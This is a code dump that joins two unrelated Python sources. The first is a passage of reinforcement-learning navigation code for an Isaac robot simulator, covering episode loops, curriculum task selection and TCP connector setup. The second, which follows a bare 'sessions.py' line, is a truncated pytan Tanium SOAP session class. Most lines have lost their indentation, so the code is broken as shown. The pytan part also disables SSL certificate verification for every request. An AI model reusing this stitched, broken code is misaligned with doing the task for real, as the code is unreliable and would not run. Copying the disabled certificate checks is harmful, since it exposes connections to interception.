model_clone.to(inference_device)
if( (config['q_ricculum_learning']) or config['create_new_AF_database']):
nav_acl = Nav_ACL(nav_acl_network,config,shared_q_net=soft_q_net1,env=env,task_offset=np.array([0,0,0]),agent_index=agent_index)
else:
nav_acl = Nav_ACL(nav_acl_network,config,agent_index=agent_index)
for param in model_clone.parameters():
param.requires_grad = False
test_grid = generate_test_grid()
test_angles = [0,45,-45,90,-90]
# print(test_grid)
for angle in test_angles:
for trial in range(0,4):
print("agent: ", agent_index, " test case: ", angle, trial, "model: ", names_list[model_index])
results = []
for task_offset in test_grid:
orig_offset = copy.copy(task_offset)  # keep a copy; the offset is shifted per agent below
task_config = config['default_test_unity']
task_config['robot_pose']['rotation_yaw'][0] = angle
task = RobotTask(task_config) # create a task instance from a config dict
task_offset[1] += (agent_index*40)
task = nav_acl.apply_offset_to_robot(task, task_offset)
task = nav_acl.apply_offset_to_dolly(task, [0,(agent_index*40),0])
task.set_q_value(nav_acl.get_q_value_for_task(task,task_offset))
num_steps, task_result, pred_prob = run_episode(env, agent_index, model_clone, nav_acl,shared_elements, 1, 0, config, test_task=task)
results.append([orig_offset,angle,nav_acl.get_task_params_array(task,normalize=False),agent_index,num_steps,task_result, pred_prob])
results_array = np.asarray(results)
np.save("/home/developer/Testing_results/"+names_list[model_index]+"_gt_agent_"+str(agent_index)+"_trial_" + str(trial)+"_yaw_"+str(angle), results_array)
def run_episodes(env, agent_index, shared_elements, config):
max_episodes = config['max_episodes']
num_Agents = config['num_Agents']
num_episodes = int(max_episodes / num_Agents)
steps = 0
robot_grid = generate_robot_grid()
task_offset = robot_grid[agent_index]
model_clone = PolicyNetwork(config)
model_clone.load_state_dict(shared_elements['policy_network'].state_dict())
model_clone.to(inference_device)
for param in model_clone.parameters():
param.requires_grad = False
if( (config['q_ricculum_learning']) or config['create_new_AF_database']):
nav_acl = Nav_ACL(shared_elements['nav_acl_network'],config,shared_q_net=shared_elements['q_network'],env=env,task_offset=task_offset,agent_index=agent_index)
else:
nav_acl = Nav_ACL(shared_elements['nav_acl_network'],config,agent_index=agent_index)
if( config['create_new_AF_database']):
nav_acl.save_tasks_for_later(task_offset,config['new_AF_database_size'],"/home/developer/Training_results/Qricculum_Learning/"+str(agent_index))
print("FINISHED SAVING TASK DATABASE FOR QRICCULUM LEARNING, saved at: ","/home/developer/Training_results/Qricculum_Learning/"+str(agent_index))
nav_acl.load_AF_database("/home/developer/Training_results/Qricculum_Learning/"+str(agent_index)+".npy")
for episode_index in range(num_episodes):
if (episode_index % config['update_nav_nets_every_N_episodes']) == 0:
# Create a new local copy of the latest Policy net before starting the episode
model_clone.load_state_dict(shared_elements['policy_network'].state_dict())
for param in model_clone.parameters():
param.requires_grad = False
if( config['q_ricculum_learning']):
nav_acl.update_networks(shared_elements['nav_acl_network'],shared_elements['q_network'],task_offset)
else:
nav_acl.update_networks(shared_elements['nav_acl_network'],None)
num_steps, result = run_episode(env, agent_index, model_clone, nav_acl,shared_elements, episode_index, steps, config)
steps += num_steps
def run_episode(env, agent_index, policy_net, nav_acl,shared_elements, num_of_episode, steps, config, test_task=None):
num_stacked_frames = config['num_stacked_frames']
train_start = config['train_starts']
max_steps = config['max_steps']
num_Agents = config['num_Agents']
t_max = config['buffer_maxlen']*num_Agents
robot_grid = generate_robot_grid()
task_offset = robot_grid[agent_index]
t = steps*num_Agents # estimate total number of steps in the replay buffer
P_Random = min(nav_acl.config['adaptive_filtering_params']['p_random_max'], t/t_max)
P_Easy = ((1-P_Random)/2)
P_Frontier = P_Easy
action_dim = (2)
nav_acl.adaptive_filtering_task_probs = [P_Random,P_Easy,P_Frontier]
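# Adaptive-filtering mix: the random-task share grows with the estimated buffer fill
# (capped by p_random_max) and the remainder is split evenly between easy and frontier tasks.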
if(test_task is None):
task = nav_acl.generate_random_task(translation_offset=task_offset)
else:
print("TEST TASK")
task = test_task
pred_prob_worker = nav_acl.get_task_success_probability(task).detach().cpu().numpy()
step_durations = shared_elements['step_durations']
episode_rewards = shared_elements['episode_rewards']
episode_lengths = shared_elements['episode_lengths']
intermediate_buffer = shared_elements['experience_queue']
intermediate_buffer_nav_acl = shared_elements['nav_acl_exp_queue']
obs_cam, obs_lidar = env.reset(task)
env.step([0,0])
obs_cam, obs_lidar = env.reset(task)
stacked_camera_obsrv = deque(maxlen=num_stacked_frames)
stacked_actions = deque(maxlen=num_stacked_frames)
stacked_rewards = deque(maxlen=num_stacked_frames)
transitions = deque(maxlen=num_stacked_frames)
episode_reward = 0
ep_steps = 0
prev_action = np.zeros(action_dim)
prev_reward = config['step_penalty']
task_result = [0]
episode_exp = []
# start with a fresh state
for i in range(num_stacked_frames):
stacked_camera_obsrv.append(obs_cam)
stacked_actions.append(prev_action)
stacked_rewards.append(prev_reward)
if(config['use_snail_mode']):
transitions.append((obs_cam, obs_lidar,prev_action,prev_reward))
start_episode = current_milli_time()
for step in range(max_steps):
start = current_milli_time()
stacked_camera_state = np.asarray(stacked_camera_obsrv).reshape((env.observtion_shape[0]*num_stacked_frames,env.observtion_shape[1],env.observtion_shape[2]))
stacked_prev_action = np.asarray(stacked_actions) # [a-4,a-3, a-2, a-1]
stacked_prev_reward = np.asarray(stacked_rewards).reshape(num_stacked_frames,1)
with torch.no_grad():
if steps >= train_start:
action = policy_net.get_action(stacked_camera_state,obs_lidar,stacked_prev_action,stacked_prev_reward, deterministic = False, device=inference_device)
else:
action = policy_net.sample_action()
### do action and get observation
step_start = current_milli_time()
next_obs_cam, next_obs_lidar, reward, done, info = env.step(action)
### append new action and reward (has to happen before appending to the replay buffer!)
stacked_actions.append(action) # [a-3,a-2,a-1, a]
stacked_rewards.append(reward)
stacked_action = np.asarray(stacked_actions)
stacked_reward = np.asarray(stacked_rewards).reshape(num_stacked_frames,1)
### append to episode exp
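        # stacked_prev_action/stacked_prev_reward were built before this step's action and
        # reward were appended, stacked_action/stacked_reward afterwards, so each stored
        # transition carries both the pre- and post-step frame stacks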
episode_exp.append((obs_cam, obs_lidar, stacked_action, stacked_prev_action, stacked_reward, stacked_prev_reward, next_obs_cam, next_obs_lidar, done))
stacked_camera_obsrv.append(next_obs_cam) # has to happen after appending to the replay buffer
obs_cam, obs_lidar = next_obs_cam, next_obs_lidar
episode_reward += reward
end = current_milli_time()
step_durations.append(end-start)
prev_action = action
prev_reward = reward
ep_steps += 1
### some manual cleanup to prevent numpy from polluting my memory
del stacked_camera_state, next_obs_cam, next_obs_lidar
if done:
if info['collision']:
task_result = [0]
else:
task_result = [1]
break
time_for_episode = current_milli_time()-start_episode
avg_time_per_step = int(time_for_episode / ep_steps)
print('Agent: ', agent_index, 'Finished Episode: ', num_of_episode, ' | Pred prob.: ', round(pred_prob_worker[0],2), ' | was considered: ', task.task_type.name, '| Episode Reward: ', round(episode_reward,2), ' | Num steps: ', ep_steps, '| avg time per step: ',avg_time_per_step, ' | done: ', task_result[0])
episode_rewards.append(episode_reward)
episode_lengths.append(ep_steps)
nav_acl.params.append(nav_acl.get_task_params_array(task,False)) # append the non normalized version of the task since we need that information for our statistics
# append results to the shared queue
intermediate_buffer_nav_acl.put((task,task_result,agent_index))
intermediate_buffer.put(episode_exp)
return ep_steps, task_result[0], pred_prob_worker
def start_isaac_sim_connector(num_Agents=1, start_port=64000):
""" creates PyCodelets for receiving and sending messages to/from the isaac simulation environment (either Unity or Omniverse) via specified tcp subscriber and publisher nodes to allow for parallel access to the simulation """
app = Application("apps/py_sac_nav_acl/py_sim_connector.app.json")
PUB_PORT_NUM = start_port
SUB_PORT_NUM = start_port+1000
for index in range(num_Agents):
#create application and create node
agent_suffix = '_'+str(index)
app_name = "connector" +agent_suffix
connector = app.add(app_name)
tcp_sub = connector.add(app.registry.isaac.alice.TcpSubscriber)
tcp_pub = connector.add(app.registry.isaac.alice.TcpPublisher)
connector.add(app.registry.isaac.alice.TimeSynchronizer)
tcp_sub.config['port'] = SUB_PORT_NUM + index
tcp_sub.config['host'] = 'localhost'
tcp_pub.config['port'] = PUB_PORT_NUM + index
#receive messages from sim and publish via TCP
app.connect('simulation.interface/output', 'collision'+agent_suffix, app_name+'/TcpPublisher', 'collision'+agent_suffix)
app.connect('simulation.interface/output', 'bodies'+agent_suffix, app_name+'/TcpPublisher', 'bodies'+agent_suffix)
app.connect('simulation.interface/output', 'rangescan_front'+agent_suffix, app_name+'/TcpPublisher', 'rangescan_front'+agent_suffix)
app.connect('simulation.interface/output', 'rangescan_back'+agent_suffix, app_name+'/TcpPublisher', 'rangescan_back'+agent_suffix)
app.connect('simulation.interface/output', 'color'+agent_suffix, app_name+'/TcpPublisher', 'color'+agent_suffix)
#receive messages from TCP and publish them to the simulation
print("messages coming from: ", SUB_PORT_NUM + index, "go to :", 'simulation.interface/input/####'+agent_suffix)
#send control messages
app.connect(app_name+'/TcpSubscriber', 'diff_command'+agent_suffix, 'simulation.interface/input', 'base_command'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_robot'+agent_suffix, 'simulation.interface/input', 'teleport_robot' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_dolly'+agent_suffix, 'simulation.interface/input', 'teleport_dolly' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix, 'simulation.interface/input', 'teleport_obstacle' +agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_1", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_1")
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_2", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_2")
app.connect(app_name+'/TcpSubscriber', 'teleport_obstacle'+agent_suffix+"_3", 'simulation.interface/input', 'teleport_obstacle' +agent_suffix+"_3")
app.start()
    # keep the connector alive until interrupted, then shut the application down
    try:
        while True:
            time.sleep(5)
    except KeyboardInterrupt:
        app.stop()
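# Illustrative invocation (sketch only): running this connector standalone for four agents
# on the default port range would look like
#   start_isaac_sim_connector(num_Agents=4, start_port=64000)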
def start_isaac_application(app, agent_index, config):
""" creates PyCodelets for receiving and sending messages to/from the isaac simulation environment (either Unity or Omniverse) """
Port = config['start_port']
PUB_PORT_NUM = Port + 1000
SUB_PORT_NUM = Port
#create application and create node
agent_suffix = '_'+str(agent_index)
app_name = "py_controller" +agent_suffix
py_controller_node = app.add(app_name)
component_node = py_controller_node.add(PyController)
component_node.config['app_name'] = app_name
component_node.config['agent_index'] = agent_index
component_node.config['tick_period_seconds'] = config['tick_period_seconds']
component_node.config['action_duration_ticks'] = config['action_duration_ticks']
component_node.config['depth_cam_max_distance'] = config['depth_cam_max_distance']
component_node.config['lidar_max_distance'] = config['lidar_max_distance']
component_node.config['goal_threshold'] = config['goal_threshold']
component_node.config['output_resolution'] = config['output_resolution']
component_node.config['using_depth'] = config['using_depth']
component_node.config['using_unity'] = config['using_unity']
component_node.config['goal_description'] = config['goal_description']
component_node.config['omniverse_teleport_dict'] = config['omniverse_teleport_dict']
component_node.config['scale_dolly'] = config['scale_dolly']
contact_monitor_node = py_controller_node.add(app.registry.isaac.navigation.CollisionMonitor, 'CollisionMonitor')
tcp_sub = py_controller_node.add(app.registry.isaac.alice.TcpSubscriber)
tcp_pub = py_controller_node.add(app.registry.isaac.alice.TcpPublisher)
py_controller_node.add(app.registry.isaac.alice.TimeSynchronizer)
tcp_sub.config['port'] = SUB_PORT_NUM + agent_index
tcp_sub.config['host'] = 'localhost'
tcp_pub.config['port'] = PUB_PORT_NUM + agent_index
print("start isaac app: ", agent_index, " \n SUB_PORT: ", SUB_PORT_NUM, "\n PUB_PORT: ", PUB_PORT_NUM, "\n")
#receive messages
app.connect(app_name+'/TcpSubscriber', 'collision'+agent_suffix, app_name+'/CollisionMonitor', 'collision')
app.connect(app_name+'/CollisionMonitor', 'report', app_name+'/PyCodelet', 'collision'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'collision'+agent_suffix, app_name+'/PyCodelet', 'collision'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'bodies'+agent_suffix, app_name+'/PyCodelet', 'bodies'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'rangescan_front'+agent_suffix, app_name+'/PyCodelet', 'lidar_front'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'rangescan_back'+agent_suffix, app_name+'/PyCodelet', 'lidar_back'+agent_suffix)
app.connect(app_name+'/TcpSubscriber', 'color'+agent_suffix, app_name+'/PyCodelet', 'color'+agent_suffix)
print("STARTED CONTROLLER WITH NAME: ", app_name, "RECEIVING TCP ON ", SUB_PORT_NUM +agent_index, "SENDING TCP ON: ", PUB_PORT_NUM+agent_index)
#send control messages
app.connect(app_name+'/PyCodelet', 'diff_command'+agent_suffix, app_name+'/TcpPublisher', 'diff_command'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_robot'+agent_suffix, app_name+'/TcpPublisher', 'teleport_robot'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_dolly'+agent_suffix, app_name+'/TcpPublisher', 'teleport_dolly'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix, app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix)
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_1", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_1")
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_2", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_2")
app.connect(app_name+'/PyCodelet', 'teleport_obstacle'+agent_suffix + "_3", app_name+'/TcpPublisher', 'teleport_obstacle'+agent_suffix+ "_3")
app.start()
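# Illustrative usage (sketch only): each worker would create its own isaac `Application`
# and call start_isaac_application(app, agent_index, config), which registers a
# PyController node with the agent's suffix, wires up its TCP channels, and then
# starts the application.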
sessions.py
"""Session classes for the :mod:`pytan` module."""
from builtins import str
from builtins import object
import json
import logging
import os
import re
import string
import sys
import threading
import time
from base64 import b64encode
from datetime import datetime
try:
import xml.etree.cElementTree as ET
except Exception:
import xml.etree.ElementTree as ET
my_file = os.path.abspath(__file__)
my_dir = os.path.dirname(my_file)
parent_dir = os.path.dirname(my_dir)
path_adds = [parent_dir]
for aa in path_adds:
    if aa not in sys.path:
        sys.path.insert(0, aa)
try:
import pytan
from pytan.xml_clean import xml_cleaner
import requests
import taniumpy
except Exception:
raise
requests.packages.urllib3.disable_warnings()
if sys.version_info < (3,0):
reload(sys)
sys.setdefaultencoding('utf-8')
class Session(object):
"""This session object uses the :mod:`requests` package instead of the built in httplib library.
This provides support for keep alive, gzip, cookies, forwarding, and a host of other features
automatically.
Examples
--------
Setup a Session() object::
>>> import sys
>>> sys.path.append('/path/to/pytan/')
>>> import pytan
>>> session = pytan.sessions.Session('host')
Authenticate with the Session() object::
>>> session.authenticate('username', 'password')
"""
XMLNS = {
'SOAP-ENV': 'xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"',
'xsd': 'xmlns:xsd="http://www.w3.org/2001/XMLSchema"',
'xsi': 'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"',
'typens': 'xmlns:typens="urn:TaniumSOAP"',
}
"""The namespace mappings for use in XML Request bodies"""
REQUEST_BODY_BASE = ("""<SOAP-ENV:Envelope {SOAP-ENV} {xsd} {xsi}>
<SOAP-ENV:Body>
<typens:tanium_soap_request {typens}>
<command>$command</command>
<object_list>$object_list</object_list>
$options
</typens:tanium_soap_request>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>""").format(**XMLNS)
"""The XML template used for all SOAP Requests in string form"""
AUTH_RES = 'auth'
"""The URL to use for authentication requests"""
SOAP_RES = 'soap'
"""The URL to use for SOAP requests"""
INFO_RES = 'info.json'
"""The URL to use for server info requests"""
AUTH_CONNECT_TIMEOUT_SEC = 5
"""number of seconds before timing out for a connection while authenticating"""
AUTH_RESPONSE_TIMEOUT_SEC = 15
"""number of seconds before timing out for a response while authenticating"""
INFO_CONNECT_TIMEOUT_SEC = 5
"""number of seconds before timing out for a connection while getting server info"""
INFO_RESPONSE_TIMEOUT_SEC = 15
"""number of seconds before timing out for a response while getting server info"""
SOAP_CONNECT_TIMEOUT_SEC = 15
"""number of seconds before timing out for a connection while sending a SOAP Request"""
SOAP_RESPONSE_TIMEOUT_SEC = 540
"""number of seconds before timing out for a response while sending a SOAP request"""
SOAP_REQUEST_HEADERS = {'Content-Type': 'text/xml; charset=utf-8', 'Accept-Encoding': 'gzip'}
"""dictionary of headers to add to every HTTP GET/POST"""
ELEMENT_RE_TXT = r'<{0}>(.*?)</{0}>'
"""regex string to search for an element in XML bodies"""
HTTP_DEBUG = False
"""print requests package debug or not"""
HTTP_RETRY_COUNT = 5
"""number of times to retry HTTP GET/POST's if the connection times out/fails"""
HTTP_AUTH_RETRY = True
"""retry HTTP GET/POST's with username/password if session_id fails or not"""
STATS_LOOP_ENABLED = False
"""enable the statistics loop thread or not"""
STATS_LOOP_SLEEP_SEC = 5
"""number of seconds to sleep in between printing the statistics when stats_loop_enabled is True"""
STATS_LOOP_TARGETS = [
{'Version': 'Settings/Version'},
{'Active Questions': 'Active Question Cache/Active Question Estimate'},
{'Clients': 'Active Question Cache/Active Client Estimate'},
{'Strings': 'String Cache/Total String Count'},
{'Handles': 'System Performance Info/HandleCount'},
{'Processes': 'System Performance Info/ProcessCount'},
{'Memory Available': 'percentage(System Performance Info/PhysicalAvailable,System Performance Info/PhysicalTotal)'},
]
"""list of dictionaries with the key being the section of info.json to print info from, and the value being the item with in that section to print the value"""
RECORD_ALL_REQUESTS = False
"""Controls whether each requests response object is appended to the self.ALL_REQUESTS_RESPONSES list"""
BAD_RESPONSE_CMD_PRUNES = [
'\n',
'XML Parse Error: ',
'SOAPProcessing Exception: class ',
'ERROR: 400 Bad Request'
]
"""List of strings to remove from commands in responses that do not match the response in the request"""
AUTH_FAIL_CODES = [401, 403]
"""List of HTTP response codes that equate to authorization failures"""
BAD_SERVER_VERSIONS = [None, '', 'Unable to determine', 'Not yet determined']
"""List of server versions that are not valid"""
# TRACKING VARIABLES -- THESE GET UPDATED BY SESSION
ALL_REQUESTS_RESPONSES = []
"""This list will be updated with each requests response object that was received"""
LAST_REQUESTS_RESPONSE = None
"""This variable will be updated with the last requests response object that was received"""
LAST_RESPONSE_INFO = {}
"""This variable will be updated with the information from the most recent call to _get_response()"""
host = None
"""host to connect to"""
port = None
"""port to connect to"""
server_version = "Not yet determined"
"""version string of server, will be updated when get_server_version() is called"""
force_server_version = ''
"""In the case where the user wants to have pytan act as if the server is a specific version, regardless of what server_version is."""
def __init__(self, host, port=443, **kwargs):
"""Constructor."""
self.methodlog = logging.getLogger("method_debug")
self.DEBUG_METHOD_LOCALS = kwargs.get('debug_method_locals', False)
self.setup_logging()
self.REQUESTS_SESSION = requests.Session()
"""
The Requests session allows you to persist certain parameters across requests. It also
persists cookies across all requests made from the Session instance. Any requests that you
make within a session will automatically reuse the appropriate connection
"""
# disable SSL cert verification for all requests made in this session
self.REQUESTS_SESSION.verify = False
server = kwargs.get('server', '')
self.host = server or host
self.server = self.host
self.port = port
self._session_id = ''
self._username = ''
self._password = ''
# kwargs overrides for object properties
self.SOAP_REQUEST_HEADERS = kwargs.get(
'soap_request_headers', self.SOAP_REQUEST_HEADERS)
self.HTTP_DEBUG = kwargs.get('http_debug', False)
self.HTTP_AUTH_RETRY = kwargs.get('http_auth_retry', self.HTTP_AUTH_RETRY)
self.HTTP_RETRY_COUNT = kwargs.get('http_retry_count', self.HTTP_RETRY_COUNT)
self.AUTH_CONNECT_TIMEOUT_SEC = kwargs.get(
'auth_connect_timeout_sec', self.AUTH_CONNECT_TIMEOUT_SEC)
self.AUTH_RESPONSE_TIMEOUT_SEC = kwargs.get(
'auth_response_timeout_sec', self.AUTH_RESPONSE_TIMEOUT_SEC)
self.INFO_CONNECT_TIMEOUT_SEC = kwargs.get(
'info_connect_timeout_sec', self.INFO_CONNECT_TIMEOUT_SEC)
self.INFO_RESPONSE_TIMEOUT_SEC = kwargs.get(
'info_response_timeout_sec', self.INFO_RESPONSE_TIMEOUT_SEC)
self.SOAP_CONNECT_TIMEOUT_SEC = kwargs.get(
'soap_connect_timeout_sec', self.SOAP_CONNECT_TIMEOUT_SEC)
self.SOAP_RESPONSE_TIMEOUT_SEC = kwargs.get(
'soap_response_timeout_sec', self.SOAP_RESPONSE_TIMEOUT_SEC)
self.STATS_LOOP_ENABLED = kwargs.get('stats_loop_enabled', self.STATS_LOOP_ENABLED)
self.STATS_LOOP_SLEEP_SEC = kwargs.get('stats_loop_sleep_sec', self.STATS_LOOP_SLEEP_SEC)
self.STATS_LOOP_TARGETS = kwargs.get('stats_loop_targets', self.STATS_LOOP_TARGETS)
self.RECORD_ALL_REQUESTS = kwargs.get('record_all_requests', self.RECORD_ALL_REQUESTS)
# re-enforce empty variables for init of session
self.ALL_REQUESTS_RESPONSES = []
self.LAST_RESPONSE_INFO = {}
self.LAST_REQUESTS_RESPONSE = None
self.server_version = "Not yet determined"
self.force_server_version = kwargs.get('force_server_version', self.force_server_version)
def setup_logging(self):
"""Logging."""
self.qualname = "pytan.sessions.{}".format(self.__class__.__name__)
self.mylog = logging.getLogger(self.qualname)
self.authlog = logging.getLogger(self.qualname + ".auth")
self.httplog = logging.getLogger(self.qualname + ".http")
self.bodyhttplog = logging.getLogger(self.qualname + ".http.body")
self.statslog = logging.getLogger("stats")
def __str__(self):
"""String method."""
class_name = self.__class__.__name__
server_version = self.get_server_version()
str_tpl = "{} to {}:{}, Authenticated: {}, Platform Version: {}".format
ret = str_tpl(class_name, self.host, self.port, self.is_auth, server_version)
return ret
@property
def session_id(self):
"""Property to fetch the session_id for this object.
Returns
-------
self._session_id : str
"""
return self._session_id
@session_id.setter
def session_id(self, value):
"""Setter to update the session_id for this object."""
if self.session_id != value:
self._session_id = value
self.authlog.debug("Session ID updated to: {}".format(value))
@property
def is_auth(self):
"""Property to determine if there is a valid session_id or username and password stored in this object.
Returns
-------
bool
* True: if self._session_id or self._username and _self.password are set
* False: if not
"""
auth = False
if self._session_id:
auth = True
elif self._username and self._password:
auth = True
return auth
def logout(self, all_session_ids=False, **kwargs):
"""Logout a given session_id from Tanium. If not session_id currently set, it will authenticate to get one.
Parameters
----------
all_session_ids : bool, optional
* default: False
* False: only log out the current session id for the current user
* True: log out ALL session id's associated for the current user
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
"""
self._check_auth()
if not self.session_id:
self.authenticate()
if all_session_ids:
logout = 1
else:
logout = 0
headers = {}
headers['session'] = self.session_id
headers['logout'] = logout
req_args = {}
req_args['url'] = self.AUTH_RES
req_args['headers'] = headers
req_args['retry_count'] = False
req_args['pytan_help'] = kwargs.get('pytan_help', '')
try:
self.http_get(**req_args)
except Exception as e:
m = "logout exception: {}".format
self.authlog.debug(m(e))
if all_session_ids:
self.authlog.debug("Successfully logged out all session ids for current user")
else:
self.authlog.debug("Successfully logged out current session id for current user")
self.session_id = ''
def authenticate(self, username=None, password=None, session_id=None, **kwargs):
"""Authenticate against a Tanium Server using a username/password or a session ID.
Parameters
----------
username : str, optional
* default: None
* username to authenticate as
password : str, optional
* default: None
* password for `username`
session_id : str, optional
* default: None
* session_id to authenticate with, this will be used in favor of username/password if all 3 are supplied.
persistent: bool, optional
* default: False
* False: do not request a persistent session (returns a session_id that expires 5 minutes after last use)
            * True: do request a persistent session (returns a session_id that expires 1 week after last use)
pytan_help : str, optional
* default: ''
* help string to add to self.LAST_REQUESTS_RESPONSE.pytan_help
Notes
-----
Can request a persistent session that will last up to 1 week when authenticating
with username and password.
        New persistent sessions may be handed out by the Tanium server when the session handed
        out by this auth call is used to login within that week. The new session must then be
        used to login, as persistent sessions will expire 1 week after issuance no matter what
        (or when logout is called with that session, or when logout with all_session_ids=True
        is called for any session for this user).
the way sessions get issued:
- a GET request to /auth is issued
- username/password supplied in headers as base64 encoded, or session is supplied in
headers as string
- session is returned upon successful auth
- if there is a header "persistent=1" in the headers, a session that expires after 1 week
will be issued if username/password was used to auth. persistent is ignored if session
is used to auth.
- if there is not a header "persistent=1" in the headers, a session that expires after 5
minutes will be issued
        - if session is used before it expires, its expiry will be extended by 5 minutes or 1
week, depending on the type of persistence
        - while using the SOAP api, new session IDs may be returned as part of the response.
          these new session IDs should be used in lieu of the old session ID
/auth URL
This url is used for validating a server user's credentials. It supports a few different
ways to authenticate and returns a SOAP session ID on success. These sessions expire
after 5 minutes by default if they aren't used in SOAP requests. This expiration is
configured with the server setting 'session_expiration_seconds'.
Supported Authentication Methods:
- HTTP Basic Auth (Clear Text/BASE64)
- Username/Password/Domain Headers (Clear Text)
- Negotiate (NTLM Only)
NTLM is enabled by default in 6.3 or greater and requires a persistent connection until a
session is generated.
"""
persistent = kwargs.get('persistent', False)
auth_type = 'unknown'
if session_id:
auth_type = 'session ID'
if persistent:
m = (
"Unable to establish a persistent session when authenticating with a session!"
).format
raise pytan.exceptions.AuthorizationError(m())
self._session_id = session_id
else:
auth_type = 'username/password'
if username:
self._username = username
if password:
self._password = password
if not session_id:
if not self._username:
raise pytan.exceptions.AuthorizationError("Must supply username")
if not self._password:
raise pytan.exceptions.AuthorizationError("Must supply password")
auth_headers = {}
if persistent:
auth_headers['persistent'] = 1
h = "Authenticate to the SOAP API via /auth"
pytan_help = kwargs.get('pytan_help', h)
req_args = {}
req_args['url'] = self.AUTH_RES
req_args['headers'] = auth_headers
req_args['retry_count'] = kwargs.get('retry_count', 0)
req_args['connect_timeout'] = kwargs.get('connect_timeout', self.AUTH_CONNECT_TIMEOUT_SEC)
req_args['response_timeout'] = kwargs.get(
'response_timeout', self.AUTH_RESPONSE_TIMEOUT_SEC
)
req_args['pytan_help'] = pytan_help
try:
body = self.http_get(**req_args)
except Exception as e:
m = "Error while trying to authenticate: {}".format
raise pytan.exceptions.AuthorizationError(m(e))
self.session_id = body
if persistent:
m = (
"Successfully authenticated and received a persistent (up to 1 week)"
"session id using {}"
).format
self.authlog.debug(m(auth_type))
else:
m = (
"Successfully authenticated and received a non-persistent (up to 5 minutes) "
"session id using {}"
).format
self.authlog.debug(m(auth_type))
# start the stats thread loop in a background thread
self._start_stats_thread(**kwargs)
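    # Illustrative usage (sketch only, assumes a reachable Tanium server named 'host'):
    #   session = pytan.sessions.Session('host')
    #   session.authenticate('username', 'password', persistent=True)
    #   print(session.session_id)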
def find(self, obj, **kwargs):
"""Create and send a GetObject XML Request body from `object_type` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to find
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* found objects
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_get_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
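    # Illustrative usage (sketch only; the taniumpy object shown is just an example):
    #   sensors = session.find(taniumpy.SensorList())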
def save(self, obj, **kwargs):
"""Create and send a UpdateObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to save
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* saved object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_update_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def add(self, obj, **kwargs):
"""Create and send a AddObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to add
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* added object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_add_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def delete(self, obj, **kwargs):
"""Create and send a DeleteObject XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to delete
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* deleted object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_delete_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def run_plugin(self, obj, **kwargs):
"""Create and send a RunPlugin XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to run
Returns
-------
obj : :class:`taniumpy.object_types.base.BaseType`
* results from running object
"""
clean_keys = ['obj', 'request_body']
clean_kwargs = pytan.utils.clean_kwargs(kwargs=kwargs, keys=clean_keys)
request_body = self._create_run_plugin_object_body(obj=obj, **clean_kwargs)
response_body = self._get_response(request_body=request_body, **clean_kwargs)
obj = taniumpy.BaseType.fromSOAPBody(body=response_body)
return obj
def get_result_info(self, obj, **kwargs):
"""Create and send a GetResultInfo XML Request body from `obj` and parses the response into an appropriate :mod:`taniumpy` object.
Parameters
----------
obj : :class:`taniumpy.object_types.base.BaseType`
* object to get result info for
Returns
-------
